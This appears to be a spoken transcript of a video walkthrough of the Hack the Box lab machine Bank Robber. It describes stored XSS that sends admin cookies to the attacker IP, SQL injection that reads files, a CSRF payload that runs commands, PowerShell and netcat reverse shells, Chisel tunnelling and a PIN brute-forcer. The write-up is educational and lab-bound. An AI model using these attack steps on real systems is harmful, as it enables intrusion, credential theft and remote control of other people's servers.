What's going on YouTube? This is Ipsec. I'm doing Bank Robber from Hack the Box, which involves a lot of cross-site scripting. The first is to use cross-site scripting to steal administrative cookies to a web application. Then when you log into that, you see there's two functions. The first one is search, which lets you search users. It's SQL injectable, so you can leak source code. And the second one lets you execute commands. Unfortunately, when you try to do that, it's only accessible from localhost. So you revisit that cross-site scripting and instead of stealing cookies, you do a cross-site request forgery attack to have that administrator execute that backdoor checker function that lets you execute code on the box. You get a reverse shell and you get on the box. After poking around, you see there is a unique port 910 listening. You use a program like Chisel to forward that port back to your box, and you see it's a custom application. You do some light fuzzing and notice there's a way to trick this application into executing code, and that's it. So with all that being said, let's get started. As always, the first thing we do is nmap the box with -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it Bank Robber, and then the IP address, which is 10.10.10.154. Can take some time to run, so I've already ran it. Looking at the results, we have quite a few ports open. The first one being HTTP on port 80, and its banner tells us it's Apache HTTPD on the Windows platform at 64-bit, with the modules OpenSSL and PHP loaded. So this is a little bit unique because normally on a Windows web server, you're used to seeing IIS. This has Apache. So I'm just going to create a note that says web server is running Apache. And generally when you see Apache on Windows, it's installed with XAMPP. And I'm just putting a question mark there because we haven't verified that. And XAMPP is just a free and open source cross-platform web server solution by Apache. So it's essentially LAMP on Linux, installs Apache, MariaDB, PHP, and just makes it so much easier. So it's probably installed with that, which would mean instead of placing documents in, I think, c:/inetpub htdocs, you place them into c:/xampp/htdocs, I think. So we can always just Google XAMPP, default location, www, and let's see. Does it say it quickly? We'll play around later on the box once we get there, if we do. But I'm pretty sure that is correct. And also, probably going to be .php, not .asp or ASPX. So that's what we can take from the notes so far. The next thing we have is SSL is listing on 443, the same exact banner, and the certificate just says localhost. We can double check to make sure there's no other names by just going to the page. So HTTPS 10.10.10.154. And if we click on advanced, view certificate, go through the details and just step through this, maybe there's like an email address or something that leaks important information. Don't see anything. The CN just says localhost, so nothing too important there. You can accept the risk, continue to the website, and you just see this. So we could poke around here, but I always like finishing enumeration before I move on. We have 445 open, saying it's probably Windows 7 to Windows 10. Workgroup is workgroup, and then we also have MySQL exposed. The host it's telling is Bank Robber. I'm not actually sure where it saw this. Maybe it is from 445. Let's see. Do I have crackmap exec installed? I do not. Let's see. Let's just try apt search crackmap exec. Is it easy to install? Apt install alt period to do the last argument. And let's install this, because I'm really curious how it gets the host name of Bank Robber, because it's not telling us that. So I guess while that goes, we can rerun this nmap command, or never mind, crackmap exec smb 10.10.10.154. Are you going to tell me the host name? Okay, so it does. It's probably leaked through 445. So that's probably how nmap got it. It's not too clear, but oh well. Let's just move on. and poke at the website after we do SMB client -L 10.10.10.154. Just see if there's any anonymous shares open. Does not look like. Also going to do a -N. Nope. So let's just move on and poke at the website. So going over here, we can click on buy eCoin, but it just, if you look at the bottom left, directs us to the top of the page. We can try logging in. We can try like admin, submit query. Doesn't work. We could try a few other things. And looking at the page, it's index.php. So I always like having some type of recon going on in the background. So I'm going to run gobuster -x php to do the PHP arguments. -u for URL, HTTP 10.10.10.154, and -w for word list, user share, word list, dirbuster, then directory list 23 medium.txt, and -o for outfile, gobuster-root, and we have to put this in dir mode for directory brute forcing. So that's just going to list all the potential pages. And now let's register. So I'm going to register with the username ip and the password of please subscribe. And that is small font, but you can see it there. And for some reason, the password field is not masking the characters, but we'll just ignore that. So click register. We have message equals user created. User created. Okay. So the first thing I'm going to just do is put some tags in here. We see this in bold. We don't. So I was just testing for like cross-site scripting. Whenever I see a message in the URL and it gets directed on a page like that, I always test for reflective cross-site scripting. If this message was in bold, then we know it works. But if we look at this, it uses HTML entities. So the actual carets are in HTML entity form, which is safe. So that's good. Let's just move on and log in. So ip, please subscribe. And we are logged in. I see a dead image icon. So I want to see where this is. Right click, copy link location. And that image is going to index.html. So I'm also going to, I guess, inspect the element to see what it is. I think I just pressed F12. Everything's on like muscle memory. And we see image logo.php. So I was looking for if it had like a host name, if it was an absolute URL and did like http://bankrobber/image logo JPEG, and maybe that's why it didn't load. But no, that's not the case. And we can check this one as well. Nope. So let's just try transferring some money. So amount, let's do leet. ID of addressee, let's do 1. And we'll say, you've got money. Kind of like the old AOL you've got mail, but you've got money. So clicking transfer, it says transfer and hold, and admin will review it within a minute. After that, he will decide whether the transaction will be dropped or not. So when I see that, it looks like there's going to be some type of interaction because it said an admin will review it. So let's set up a cross-site scripting. So I'm going to do image source equals HTTP 10.10.14.2 / please subscribe.jpg. And it may need me in quotes, it may not. I don't think it does. So just going to create a new window, NC LVNP 80. And that's going to let us see everything about his browser. So let's just do copy this, transfer. And I'm just going to go in my notes, XSS payloads. I'm going to put this one. And I'm just going to look at it real quick. Image source. That should be fine. And I'm going to give it a few minutes. So what I'm going to do is I'm going to do sleep, let's say 5 minutes, so 300, and pause the video, and we'll resume it after this sleep is done. The sleep isn't done, but we did get a request from 10.10.10.154. They're getting that image, and we can see the user agents, Mozilla, Phantom.js, Safari 538. So it looks like we do have some type of cross-site scripting. So the very first thing I'm going to do and inspect how my cookies are stored, because this is going to tell me how I do my cross-site scripting payload. So press F12 again, go to storage, and we can look at our cookies. If we look at password, we see it's just base64, and HTTP only is set to false. So I'm going to copy this value real quick, this base64, and let's just echo and see what this is. So echo base64-D, please subscribe. So the cookies themselves are just the credentials, and HTTP only is not set to false, or not set to true. So we can probably do cross-site scripting, steal cookie. Let's just do this, payload all the things. Let's see if it's in here. Payload all the things GitHub. There we go. If not, I'll just write it from memory, but I always like showing places I go to find information. So let's see. Cross-site scripting. I guess HTML applications. No, let's see. Document.cookie. Script. I guess we can try this. I don't know if that'll work, but might as well try it. And let's send this over to Burp Suite. So let's see, Burp Suite, target, proxy, intercept on, transfer. Okay. Wait, that's my portal. Didn't send it to me. Transfer eCoin. Okay, how do I disable this portal? Stop it. Is it about config, accept, portal? Captive portal, disabled. Okay, I think that's it. Let's just do HTTP instead of HTTPS. Okay. I guess we can try this now. 1, intercept is on, transfer eCoin. We can un-URL encode this to look at it. We want to send this location to be 10.10.14.2. And just say cookie is equal to document.cookie. One thing I like doing is converting this to base64, just in case there's any weird special characters that would break the URL parameter. And in JavaScript, B2A is how you convert it to base64. So send this to repeater. And we can do a netcat again. Just send it again in case it was instant. And we can start our sleep on 300. And while that goes, let's look at a different way to do cross-site scripting. So this worked. We're testing. And is there another payload all the things thing we can look at? Let's search for on error. There we go. That's a JavaScript keylog. There we go. This is what I want. Image source on error. So this is just displaying something we want to send something. So let's just copy this. And the other way we can do it is image source is equal to X, then on error equals this dot src equals the URL. So we can just do this and then question mark, because after the URL you do question mark for arguments. C is equal to plus B2A document.cookie. That's not the exact payload I used. Oh well. That should be fine. Don't have anything there. And because we're testing multiple payloads, I'm going to, do python-m simple HTTP server on 80. We don't need to see anything other than URL. So instead of doing like netcat, I guess I could do -k, I think, to keep open. So we see them all, but I'm not interested in the like verbosity of seeing an entire request. So let's go back to Burp Suite, paste this one. I did Control U, and we'll say this one's going to be cookie. So all I changed was the $C to $cookie because I want to know if it's this payload that hit or the previous payload that hit. So do this, send, and then let's renew or sleep for 5 minutes and wait. So it probably took around 3 or 4 minutes, and we got the response back. So before I do anything else, let's just log the payload we had working, because nothing's worse than forgetting your cross-site scripting payloads. So I'm just going to copy this, and we can just say this worked as well. We didn't get the $C, only the cookie, so that very first one we did doesn't appear to be working. So let's just copy this, echo-n, paste, base64-d, and then we can do the username. %3d is just an equal sign, so let's do echo-n, base64-d, and maybe echo? Maybe it doesn't want that -n. Oh, I didn't put the equals. There we go. But you were saying it did say admin, so there's that. This one has 2 equals, so echo-n, base64-d, and the password is hopeless romantic. So let's go take a look at what happens when we log in. So let's go here. We can log out. Probably have to disable burp. And we can log in with admin and hopeless romantic. I think I mistyped that. Yep. Let's do admin hopeless romantic. There we go. So looking at the top, we have a few things. There is security, which is going to this backdoor checker, and it's saying to quickly identify backdoors located on server, we implement this function. For safety issues, you're only allowed to use the dir command with any arguments. So I'm going to try doing what it says, run dir, and it says it's only allowed from localhost. This is due to a recent attempt to hack our server. So the backdoor checker is only accessible from localhost, and this is probably backdoor checker.php. Let's go see exactly what this is. So if we go back to burp, HTTP history, and we can look at this, it's doing a post to /admin/backdoor checker.php. So let's do /admin/backdoor checker.php. Okay, let's move on to the next thing. We got search users, and it wants an ID. So if I do 1, I get admin. If I do 2, I get GIO. We can do a single quote in here. We get there's a problem with your SQL syntax. I'm going to do --, which is a comment in MySQL, and it works. So looking at this, admin search.php, this is definitely injectable. So what I'm going to do is let's get a legitimate query, go back to burp, and let's run SQL map while we look at the rest of this. Because again, always want some type of recon going in the background. So right click, copy to file. I'm going to say search.request. And then we can go back here. We can look at GoBuster, see what it says. Still running. Probably don't need it anymore, so we can just kill that. Do a ls, SQL map, -r for request, search -request. We can do --dbms, MySQL, because we know it's MySQL. And --technique is equal to union. Let's just verify union works real quick. Send to repeater, and we can do order by. And this is going to identify how many columns it's extracting. So order by 1, nothing. 2, 3, and 4. We get an error. So we know because 3 is the highest number that worked, there's going to be 3 columns. So now we can do union, select 1, 2, 3, and verify this is union injectable. We get 1, 2, and there's no 3. And if you did 1, 2, you'll get error in SQL. If you do 4 things, you get another issue. So let's run SQL map, technique U, and I'm going to do --dump. Okay, I think there's a --batch as well, so it doesn't ask us any questions. There we go. So it's just going to keep going down. We can take a look at transactions. This looks like transactions waiting for approval. So that's where the cross-site scripting thing happens. I bet if I refresh this page, that'll probably be gone because it's been quite a while. Let's do proxy intercept off. Yeah. So this is just how the cross-site scripting thing works. There's probably an automated thing that takes this and then goes to a page to get executed. But let's look at notes.txt. Move all files from the default XAMPP folder. So this is definitely now confirmed, installed with that application. Encode comments for every IP address except localhost, and take a break. So nothing really interesting in the comments, but let's look at what information we have dumped. So we have balance of every account, and then we have a few users. IPsec and IP has a password please subscribe. So this database isn't doing any hashing. So what we probably should do is go here and do creds, admin this, and then GIO. Always take a note of all the creds you get. And then you can also do a --users, I think, in SQL map. And this will dump the users, which is here. Maybe if I don't do batch. Let's see. --help. --passwords. Because I honestly don't really care about knowing all the users. I guess if I saw one that wasn't at localhost. If you don't know MySQL, the usernames also take where they can log in from. So I think it's % is wildcard. So if you saw like root at %, that would mean root can log in from anywhere, but this is just saying root can log in from localhost. All this being said, we want the password hash because that password may be reused. Maybe if we got the password, we can then log in through SMB or something. So do you want to store the temporary file? No. I would do node to dictionary attack and we get the password hash. So this one, if you do hashcat -- example hashes and pipe this to less, MySQL, you can see this is probably going to be mode 300. But I'm pretty certain it's not going to crack. So I'm not going to bother right now. So we have that. And this is about all we can get from the database. There's a few pieces of information I kind of want to know. So let's do some manual queries. Anything we put at 1 or 2 will be displayed back to us. So if I do support me on Patreon where 2 is, you can see it gets placed there. So what I want to know is the user. So I'm going to do user parentheses, And we see that's root at localhost. I'm going to try system_user, I think. And this is also saying root at localhost. I was trying to identify who I am. If this was a Microsoft SQL server, I'd try a bunch of things like XP CMD exec to execute code, or different ways to request a file off a file share to steal the hash of the user connecting. But it doesn't look like it is. It's definitely MySQL, which doesn't support those things. That being said, MySQL does support reading files. So we can do select, load, I think underscore file, and then C:\Windows system32 license.rtf. Let's see if this works. Send, and we get the file. So we definitely can get files, and if I want to get a file, I want to see how this backdoor checker is, to see if there's a way we can get bypass this localhost thing. So what I'm going to do is we'll do load file, C:\. Actually, before we do that, let's do @data_dir. And this will tell us where the data directory is. So it's in C:\xampp/mysql. So if we go back, let's try C:\htdocs/index.php. Let's see if we get this file back. And it looks like we do. So let's see. Is there anything here? Username, password. Let's see. Username equals admin. Nothing too important there, but we can do /admin/backdoorchecker.php and see what this code is. So we have an include statement. Let's just copy this and make dir soc admin v backdoorchecker.php. We probably set paste to send in paste mode. And then let's re-edit this. We can do PHP. There we go. So now we have syntax highlighting. It's a bit annoying that we have all these line breaks, but oh well. So let's see. I'm going to look at what auth and link.php is real quick. So C:\admin auth.php. See what this is. So get username, get password. If the username is not this, kill the page. So this is preventing us from accessing backdoor checker without a valid username, because it's going to load the script, and then this check's going to fail, and then it's not going to execute the rest of the script. The other one was link.php. So let's go see what this is. And we have user root password welcome1. So this is probably going to be that MySQL password we saw. So we can do this. There we go. And going back to this source code, this is the backdoorchecker.php. We're seeing how it works. So the checking the username and password again, despite it already being done this auth.php thing, but oh well. So if is set, post cmd, filter escape bad characters. So let's see. If string position post cmd is equal to anything in char. So let's see. Where is char? For bad as car. So bad is going to be the $open and sign. And if it's Windows, good is okay. So the bad characters are this and this. So we can probably execute code with the pipe to chain commands. And if this was on Linux, you can use backticks to get around that one. So there's definitely ways to go around this because they're not doing sufficient bad character checking. So let's see. Check if the first two characters are ls. So if substring post cmd is equal to good, and we look at good is ls, but if we're on Windows, good is equal to dir. So our ls, we can say Linux or dir Windows. So we just got to make sure the beginning of the thing is dir. And then we have if server remote address is equal to localhost, do this. So it does 3 checks: bad characters, dir, and remote address. So probably didn't need to read the source to understand it. We could have got lucky with fuzzing, but because it takes like 5 minutes for every cross-site scripting thing to work, it's nice knowing everything ahead of time. So we can just save that and look at the request to send this. So we have burp and going to the proxy intercept on. And this is the request we send. So super easy. The one thing I want to do, let's just go up to directories, make dir dub, go in dub, and I'm going to do my cross-site scripting payload in this directory, and then we'll send it over with a script tag. So if you watch the holiday video, this is essentially the same thing. So we'll call this please sub.js, and var xhr is equal to new XML HTTP request. And I don't like capitalizing all that. There we go. And then var URL is equal to HTTP localhost admin backdoor checker.php. So what I'm doing here actually is creating a payload that instead of doing that cross-site scripting to send a GET request, it's going to do a cross-site scripting to send a POST request to itself on this command. So hopefully it'll probably make sense once it's done being written. But var params is equal to cmd is equal to dir ping. I always do this. So Linux uses -n, I think. Linux uses -c, and Windows uses -n. So -n1, 10, 14, 2. One of these days, I'll actually remember that. I don't know why, I just can't. So I'm going to do this XML request, .open, post, and the URL. So this is going to create that XML request. The next thing we need to do is set our header. So request header, and this is going to be content type, and application x www form URL encoded. Okay, I was just looking here. This is the thing I want to set. And then xhr with credentials equals true. This line is going to send the existing cookies that the web browser knows about. And then we can do xhr.send params. Okay, that should be good. Python-m simple HTTP server on port 80. Already in use. Let's go here, kill that. Start it here. And then we can go back here, and it looks like I have to create or I probably don't. I can go to repeater 1 and type it here. So this one, I'm just going to do script src is equal to http 10.10.14.2 slash please sub.js slash script. Control U to encode this, and then we will send it. And if we look here, it's probably going to burp. We can see it's waiting to be approved. So I'm just going to do sleep 300 again. And actually, we have to do TCP dump -I ton 0 ICMP. So we can see the actual ping work. So this is going to confirm the code execution. So now we can just wait and see if this all works. So I'm going to wait 5 minutes and hope for the best. And that was actually almost instantly, probably like 15 seconds after I paused the video, we got the request. So that's definitely very good for us. And now we just have to get a shell. So we can replay the same exact request. We just have to edit this. And that's why I like doing it this way, where we have the cross-site scripting payload send the request to us and we load the rest, because we just save a piece that we know works. So we could do PowerShell. So let's do PowerShell dash what's the bypass flag? Exec bypass -F to run a file, and we can run it against a share in RBox. So 10.10.14.2, please subscribe, and we'll call this nashang.ps1. That should work. And now we just do nclvnp 9001, and then cp user share nashang shells invoke PowerShell tcp.ps1 to www/nashang.ps1. Is that what I called it? Cat, please sub. Nashang.ps1. Yep. Okay. www.nashang.ps1. And all we do is take this example for reverse, put it at the bottom, and do 10.10.14.2 port 9001. Okay. Go back to burp, repeater, send. And we're at it. We can double click up here, and this will be CSRF. This one is SQL inject, and this we don't need anymore. Okay. And one of the things, instead of just waiting, if you want to use your time wisely, you can just start taking screenshots. So I think Control-Shift F4, and then we can go this, copy. Actually, for a prettier screenshot, probably want that on one line. And copy this. Go to Cherry Tree. Screenshots. This will be XSS load, paste. And it's always good to have as many screenshots as you want. So, / please sub. Take this. And take this screenshot. So generally, that's what I'd be doing while I'm waiting for things if I was actually working right now. But I was hoping it would do the request while I was doing that, and I wouldn't have to pause the video. But yeah, I'm going to pause the video, and we will just wait for... Oh, there we go. It hit. So it got please sub.js. And I was an idiot. cd www. Yeah. Mpacket, SMB server. Less. So, for some reason, I was thinking I was doing an IEX, which loads it off the web server, but I decided to change it up and execute a file. And we didn't start a SMB server. So, Mpacket-SMB server the share name, which is please subscribe, and then the location, which we'll just do PWD. And then I want to do -SMB2 support. I think it's --. Nope, just one dash. Okay. Now, let's redo this. So we probably could do the IX, but later on, I just always like having a share drive where I can just copy files to and from the server quickly. And yeah, so now I'm going to wait 5 minutes. So after a few minutes, we did get a hit back, and we have bank robber / the user Corton. So we can copy this whole thing, and let's just save this because there's going to be another hash we could potentially crack in the future. So creds, this will be probably Antilium v2 maybe. Forget the type off the top of my head, but there's that. Yeah, so now that we're on this box as Corton, we can do who am I / all and look at the tokens we have. If we had the SE impersonation token, we'd probably do like Juicy Potato or something. This box is in a different language. So this is probably administrators. What is that? So let's see. Dutch. So notes local language equals Dutch. And this would be important if we're doing any type of cracking or things, because if the language is not English, maybe an English word list may not make sense. So let's just move on to other things on this box. We can do net use z:101014.2. Please subscribe. And if we go to Z, net use, let's do y:, maybe that drive letters in use. The term use, let's do new PS drive, new PS drive. See what the syntax is here. Dash name, IPsec, and then where's location? PS provider and root. Let's do 10.10.14.2. Please subscribe. CD IPsec. And there we go. So for some reason, the PowerShell probably had some type of alias set for net. So net use was not the net use I was expecting. But we got the file here. So now we can do CD opt, privilege escalation, awesome suite. Do I not have it? There we go. CD WinPeas, WinPeas exe, WinPeas, bin, x64, release, and CP this into HTTP boxes bank robber. And I was lazy and didn't create an SMB directory. My SMB shares out of dub. But now we have it here. So we can just do winpeas.exe and then cmd. So this should execute pretty much what linpeas is, or if you haven't watched recent videos, it's just a privilege escalation script to do a bunch of things. Sometimes you get responses back in color on Windows, sometimes you don't. So when it's in color, it makes the box a lot easier. But I'm just going to wait a few minutes for this to run, and then we will resume. And if you want to know all the commands, if you just Google WinPeas GitHub, you can look at it. Let's see, WinPeas exe. And it gives you all the syntax. So I did CMD to do all checks. So there we go. It's done. So looking at auto run applications, probably not that important because, well, we're not rebooting the box. Installed applications via the registry. Mozilla, this is probably to do that cross-site scripting thing. XAMPP, so nothing out of ordinary there. Installed applications. Looks like everything's pretty standard. Current active Windows. Don't understand. It's in German. I think it being a different language is breaking some of the things. Because it's probably like doing some type of regular expression, and then something happens. So, weird. Processes non-Microsoft. MySQL, XAMPP, WinPs. Users, admin, and Corton. So, I'm not going to use the script. Instead, we're just going to poke around the box manually. Oh, we got bankv2.exe. Can we copy this? Bankv2.exe. IPsec. I'm guessing we only have whatever A is. We don't have read on this because this is a permission denied. But that is definitely interesting. We should take a look at task list to see if that's running. We can look at Corton, desktop, that's user.txt. So let's do task list /v for verbose and see what bankv2 is. So that's the process. Let's see, I'm going to search for bankv2, my whole history, to see if WinPs said anything about it, and it did not. So the other thing we can do is netstat-an and look at open ports to see if there's anything just listing on localhost. So let's see. 80 is the web, 135 and 445 is Samba or SMB, 443 is HTTPS, 910. So we got something listing on 910. It's saying it's listing on all interfaces, but we can't access it. So this is definitely going to be probably where we should look at. So let's go back into our IPsec drive and run chisel to forward that port back to us. So just go GitHub chisel to download it. We could build it from source or just go to the web page and go to releases and download the ones we want. So we want Linux because we're on Linux, so we need to run it there. And we want Windows. So let's go into www and then copy the two things here. So copy downloads stir.gz here. CP. Oh, we can do env. And then gunzip-d chisel to ungunzip it. I didn't know a good word to say that. Uncompress. So chisel Linux, AMD64. Let's do chmod plus X. And then I'm going to move this one to be just chisel.exe so it's easier to type. So chisel Linux, and we want to do server. We'll do port. We're using 9001, so I'll do 9002 and -reverse to enable reverse shells or reverse tunnels. And if this part doesn't make sense to you, watch the Reddish video because that's where I go over chisel most in depth. So we want to do /chisel.exe client 10.10.14.2, 9002 to connect to us. And then the syntax are for reverse tunnel, port 9010, and it goes to 127.0.0.1, 910. Okay. And let's see if it executes. Come on. Maybe going a bit slow because it's over this SMB. So 10.10.14.2. That syntax is right. SSLNPT. grep 910. So we're just waiting for this to give us a shell. NC LVNP 9001. Oh, wait. We got a request back. Okay. But looks like Chisel has took over my command, so I can't run other commands. So should get another shell briefly. But while we do, we can now do that SSLNP. And we see we're now listening on port 910. So if I do nmap-sc-sv-n for no DNS, we can, that should be fine. Localhost 910. So should get a response back. And while that runs, we can do nc localhost 910 to see what this port is. So Internet eCoin transfer system. Please enter your super secret 4-digit PIN to log in. 1234 is always a safe bet. Access denied. 4 zeros. Access denied. Looking at this, I didn't do -p. That's what I was missing. -p 910. But Nmat's probably not going to be that much of a help because we see this is a custom application. This is probably the bankv2.exe. I guess we have to write a brute forcer to get into this. So v brute.py. We can do from pwn import star for I in range 0 to quad 9s. And we'll do code is equal to i.zfill 4. And all that's going to do is do padding, so it's always 4 characters. So if I do pip3 install pwn tools, because I didn't have it on this version of Kali. And there we go. Now that pwn tools installed, we can run this. Int object has no attribute zfill. Let's do. It's weird. Pin is equal to stri pin.zfill. There we go. So if we do a head, we can see that loop with just 1, it puts 3 zeros. If you look at this, it would do 2 zeros before 10. So that just does the padding. So there's that. Then we need r is equal to remote localhost port 9010. So we're connecting to ourselves, which then goes through a tunnel. And then r dot receive until nc localhost 910. We want that. Okay. And then r dot send line code. And then response is equal to r dot receive line. And we'll close the socket. If access denied, not in response, print code break. Python 3 brute. Bytes like object, not string on line 10. Probably do B. Okay. And it stopped at 0021. 0021. Pin is correct. Enter the amount of eCoins you like to transfer. Let's do 1. Transferring 1 coin to an application. Executing eCoin transfer tool. C:\users admin document transfer.exe. So let's see if we can copy this file. Didn't send us a shell. That was rude. Oh, our nmap connected to us. Darn it. Our nmap beat the thing. We can disconnect. 0021. Let's send it 100 A's. Python-C print A times 100 to see what happens. 0021. And we get executing transfer tool and it's just straight A's. So if we do A times 32, let's see what happens. Actually, before we do 32, for A's, it's still doing transfer.exe. 32, we're not doing anything. Did I just guess that number? 42. (0021). Yeah. So after 32, it looks like it erases the buffer. So the way I would normally do this is locate pattern create, and then we'd run this. And what is it? -L 100. And once this actually loads, we could copy the string. So we could copy this. 0021, paste, and then copy a few things. And instead of pattern create, it would be pattern offset. And we do -Q and -L 100. So this will probably tell us at 32, it's when it repeats. 0AB1. $32. So it just didn't like it being this long string. But there we go. At byte 32 in that string, it erases. So what we can do is, let's see. If we go to www, cat please sub.js, let's see how long this is. This looks like it's over 32 characters. Echo wc-c 73. So chances are we don't want to use this. 57. $37. So this is probably going to be a no-go just because of how long it is. That being said, we can execute anything, so we can just create an executable. So do we have a shell yet? We do not. Why do we not get a shell? Has it not been 5 minutes? So let's see. I guess we can just download Netcat. So Netcat x64 Windows, and go download this. Small update, get 112, save, and then CP downloads. What's the file name? Netcat. Here, unzip it, nc64.exe. So let's do 0021. We gotta do 32 A's. So python-c print a times 32. And we can do that 10, 10, 14, 2. We'll redo our share. I just killed Chisel. Okay, it restarted. Sweet. Share. We'll just do P. And then nc64.exe. And we want to do, what are the options? Think -e, cmd, 10, 10, 14, 2, 9001. Oh, we'll do 9003. So we can copy this. Do 021, paste, and it's executing 10, 10, 14, 2, p nc64.exe. Doesn't look like we got a hit back. And doesn't look like anything. Talk to our SMB server. So maybe it doesn't want 4 slashes. Do 021. Paste this. It's doing something. Connection reset. You're authenticated. And then something weird happened. Let's just try moving the -e option to the other side. -e should execute something. Actually, let's not even try executing something. Let's just connect to the socket. So let's copy this and see if this works. So copy, then 0021, paste, and of course we would have got a shell, but we renamed our share so the please subscribe thing didn't get executed. So let's www please subscribe.js and change this to just /p. As a reminder, we had changed that because we have 32 bytes we can work with in our payload, so we wanted to make sure we fit it. So send this request in, and in 5 minutes we'll probably get a shell. We can disconnect -e cmd. I'm really not sure why this isn't working. We need to do 021, paste. Oh, it's back to 4. Do 1. Copy. 021, paste. Authenticated, but did not execute it. get rid of the eCMD. So this should just connect straight to us. Do one, paste, nothing. We got a shell, so what I'm going to do, can we cd ipsec still? New ps drive dash, what is the syntax? Dash name p dash, we can just copy, paste, nope. Dash ps provider file system dash root 10.10.14.2 p. We're missing something. I don't know what we're missing. New ps drive dash name ip. I don't want to use ipsec because we already used it. So copy dash paste. We can do 10.10.14.2 p. There we go. Must have had a bad character or something. So now we should be able to test our NC64 payload. So if I copy, paste, should take a second to load. Well, it connected. I'm not sure why it sent what it did, but Netcat's definitely working. So let's try copying nc64.exe to c:, users Corbin. Is that the name? cd users. We gotta go to c:, cd users Corton. Copy z: nc64.exe to n.exe. Copy ip nc64.exe to n.exe. dir. Okay. So let's, instead of doing this UNC path, c: /users Corton n.exe 10.10.14.2 9003 eCMD. And we'll hope this works. 0021, paste, and there we go. So for some reason, that just didn't like executing off of the file share. But cd /users administrator desktop, path didn't exist, cd users administrator admin desktop, and we can get root.txt. So that is the box. Hope you guys enjoyed it. Take care, and I'll see you all next week. Administrator desktop, path didn't exist, cd users, administrator, admin, desktop, and we can get root.txt. So that is the box. Hope you guys enjoyed it. Take care, and I'll see you all next week.